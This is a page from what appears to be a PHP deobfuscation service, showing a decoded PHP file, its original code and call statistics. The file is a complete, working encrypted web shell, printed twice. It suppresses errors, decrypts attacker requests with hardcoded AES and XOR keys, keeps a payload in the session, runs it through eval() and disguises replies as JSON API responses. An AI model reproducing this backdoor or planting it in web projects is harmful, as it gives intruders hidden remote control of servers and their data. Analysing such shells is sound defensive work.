Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function aes128..

Decoded Output download

<?php 
@session_start(); 
@set_time_limit(0); 
@error_reporting(0); 
 
 
 
function aes128($data,$mode){$result="";$blocksize=16;$key=base64_decode("0J5YM0fKgYVrmMkwTUIF+Q==");if($mode==1){$pad=$blocksize -(strlen($data)% $blocksize);$data .=str_repeat(chr($pad), $pad);}if(function_exists("openssl_encrypt")){if($mode==1){$result=openssl_encrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}else{$result=openssl_decrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}}else if(function_exists("mcrypt_encrypt")){if($mode==1){$result=mcrypt_encrypt("rijndael-128", $key, $data, "ecb", "");}else{$result=mcrypt_decrypt("rijndael-128", $key, $data, "ecb", "");}}if($mode==2){$pad=ord($result{strlen($result)-1});if($pad > strlen($result))return false;if(strspn($result, chr($pad), strlen($result)- $pad)!=$pad)return false;$result=substr($result, 0, -1 * $pad);}return $result;}function xorEncrypt(&$data){$key=base64_decode("R84sh+6uJ9oXJpMfw2pc/Q==");$len=strlen($data);$keyLen=strlen($key);$index=0;for($i=1;$i <=$len;$i++){$index=$i-1;$data[$index]=$data[$index]^$key[($i%$keyLen)];}} 
 
$requestData = file_get_contents("php://input");$strSize = strlen($requestData);$requestData = substr($requestData,110,strlen($requestData)-112); 
$requestData = pack("H*",$requestData);$requestData = aes128($requestData, 2); 
$payloadName="t0ZxUhoh"; 
if (isset($_SESSION[$payloadName])){ 
    $payload=base64_decode($_SESSION[$payloadName]); 
    eval($payload); 
    $responseData = @run($requestData); 
    xorEncrypt($responseData);$responseData = base64_encode($responseData); 
    $responseData=base64_decode("eyJjb2RlIjowLCJkYXRhIjp7InN1Z2dlc3RJdGVtcyI6W10sImdsb2JhbCI6ImUxSlRRWDBwWg==").$responseData;$responseData.=base64_decode("IiwiZXhEYXRhIjp7ImFwaV9mbG93MDEiOiIwIiwiYXBpX2Zsb3cwMiI6IjAiLCJhcGlfZmxvdzAzIjoiMSIsImFwaV9mbG93MDQiOiIwIiwiYXBpX2Zsb3cwNSI6IjAiLCJhcGlfZmxvdzA2IjoiMCIsImFwaV9mbG93MDciOiIwIiwiYXBpX3RhZyI6IjIiLCJsb2NhbF9jaXR5aWQiOiItMSJ9fX0=");@http_response_code(200);header("Content-Type: application/json");echo $responseData; 
}else{ 
    $_SESSION[$payloadName] = base64_encode($requestData); 
} 
 ?>

Did this file decode correctly?

Original Code

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);



function aes128($data,$mode){$result="";$blocksize=16;$key=base64_decode("0J5YM0fKgYVrmMkwTUIF+Q==");if($mode==1){$pad=$blocksize -(strlen($data)% $blocksize);$data .=str_repeat(chr($pad), $pad);}if(function_exists("openssl_encrypt")){if($mode==1){$result=openssl_encrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}else{$result=openssl_decrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}}else if(function_exists("mcrypt_encrypt")){if($mode==1){$result=mcrypt_encrypt("rijndael-128", $key, $data, "ecb", "");}else{$result=mcrypt_decrypt("rijndael-128", $key, $data, "ecb", "");}}if($mode==2){$pad=ord($result{strlen($result)-1});if($pad > strlen($result))return false;if(strspn($result, chr($pad), strlen($result)- $pad)!=$pad)return false;$result=substr($result, 0, -1 * $pad);}return $result;}function xorEncrypt(&$data){$key=base64_decode("R84sh+6uJ9oXJpMfw2pc/Q==");$len=strlen($data);$keyLen=strlen($key);$index=0;for($i=1;$i <=$len;$i++){$index=$i-1;$data[$index]=$data[$index]^$key[($i%$keyLen)];}}

$requestData = file_get_contents("php://input");$strSize = strlen($requestData);$requestData = substr($requestData,110,strlen($requestData)-112);
$requestData = pack("H*",$requestData);$requestData = aes128($requestData, 2);
$payloadName="t0ZxUhoh";
if (isset($_SESSION[$payloadName])){
    $payload=base64_decode($_SESSION[$payloadName]);
    eval($payload);
    $responseData = @run($requestData);
    xorEncrypt($responseData);$responseData = base64_encode($responseData);
    $responseData=base64_decode("eyJjb2RlIjowLCJkYXRhIjp7InN1Z2dlc3RJdGVtcyI6W10sImdsb2JhbCI6ImUxSlRRWDBwWg==").$responseData;$responseData.=base64_decode("IiwiZXhEYXRhIjp7ImFwaV9mbG93MDEiOiIwIiwiYXBpX2Zsb3cwMiI6IjAiLCJhcGlfZmxvdzAzIjoiMSIsImFwaV9mbG93MDQiOiIwIiwiYXBpX2Zsb3cwNSI6IjAiLCJhcGlfZmxvdzA2IjoiMCIsImFwaV9mbG93MDciOiIwIiwiYXBpX3RhZyI6IjIiLCJsb2NhbF9jaXR5aWQiOiItMSJ9fX0=");@http_response_code(200);header("Content-Type: application/json");echo $responseData;
}else{
    $_SESSION[$payloadName] = base64_encode($requestData);
}

Function Calls

pack 1
aes128 1
strlen 3
substr 1
base64_decode 1
session_start 1
set_time_limit 1
error_reporting 1
function_exists 2
file_get_contents 1

Variables

$data
$mode 2
$result
$strSize 0
$blocksize 16
$requestData

Stats

MD5 843beb68dc20820afbaf7a864083a456
Eval Count 0
Decode Time 113 ms